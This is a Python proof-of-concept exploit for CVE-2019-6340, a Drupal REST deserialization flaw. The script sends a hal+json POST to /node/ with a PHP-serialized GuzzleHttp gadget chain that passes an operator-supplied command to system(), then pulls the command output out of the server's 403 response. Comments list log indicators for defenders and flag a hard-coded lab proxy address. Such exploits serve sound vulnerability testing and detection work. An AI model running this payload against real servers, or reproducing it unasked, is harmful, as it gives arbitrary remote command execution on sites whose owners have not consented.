import requests
import sys
import re
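# CVE-2019-6340 check. Sends one hal+json POST to <url>/node/ whose
# "link[].options" field carries a PHP-serialized GuzzleHttp object, then looks
# for command output appended to the 403 error body.
#
# Indicators a defender can match in web/WAF logs, all visible in this request:
#   - POST to /node/?_format=hal_json
#   - Content-Type: application/hal+json
#   - body containing the serialized class names GuzzleHttp\Psr7\FnStream and
#     GuzzleHttp\HandlerStack inside an "options" string

# Seconds to wait for the server; requests has no default timeout and would
# otherwise block forever on an unresponsive host.
REQUEST_TIMEOUT = 10

print("\n\nExample: python CVE-2019-6340.py url cmd\n")
if len(sys.argv) < 3:
    # Both positional arguments are required. Without this guard the script
    # raised IndexError before the usage line was ever printed.
    sys.exit(1)

url = sys.argv[1]
url_dir = "/node/"
vuln_url = url + url_dir
print(">>>Vuln Url=%s" % vuln_url)

querystring = {"_format": "hal_json"}
cmd = sys.argv[2]
# The serialized string field is written as s:<length>:"<value>", so the
# length is substituted alongside the value.
cmd_length = len(cmd)
payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"http://172.17.0.15/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_length, cmd)

# NOTE(review): hard-coded private address. Both HTTP and HTTPS traffic is
# routed through it, and the same host appears in the payload's
# _links.type.href, so as written the script is tied to the author's lab
# network whatever url argument is given.
proxies = {"http": "http://172.17.0.15:80", "https": "http://172.17.0.15:80"}
headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    'Connection': "close",
    'Content-Type': "application/hal+json",
    'Accept': "*/*",
    'Cache-Control': "no-cache",
}

try:
    response = requests.request(
        "POST",
        vuln_url,
        data=payload,
        headers=headers,
        proxies=proxies,
        params=querystring,
        timeout=REQUEST_TIMEOUT,
    )
except requests.RequestException as exc:
    # A transport failure says nothing about whether the host is affected, so
    # report it separately instead of letting it read as a negative result.
    print("Request failed: %s" % exc)
    sys.exit(1)

# "u0027" is the JSON escape for an apostrophe; the marker presumably comes
# from the server's access-denied message (confirm against a known response).
if response.status_code == 403 and "u0027access" in response.text:
    print("\n>>>>Exit CVE-2019-6340 RCE Vuln!\n")
    # Anything after the closing `permissions."}` of the JSON error body is
    # treated as command output.
    m = re.findall(r'.*permissions."}(.*)', response.text, re.S)
    if m:
        # The pattern can fail to match even when the marker is present;
        # indexing an empty list used to raise IndexError here.
        print(m[0])
else:
    # Any other status, or a 403 without the marker, lands here, so this
    # message alone is not proof that the host is patched.
    print("No Vuln Exit!")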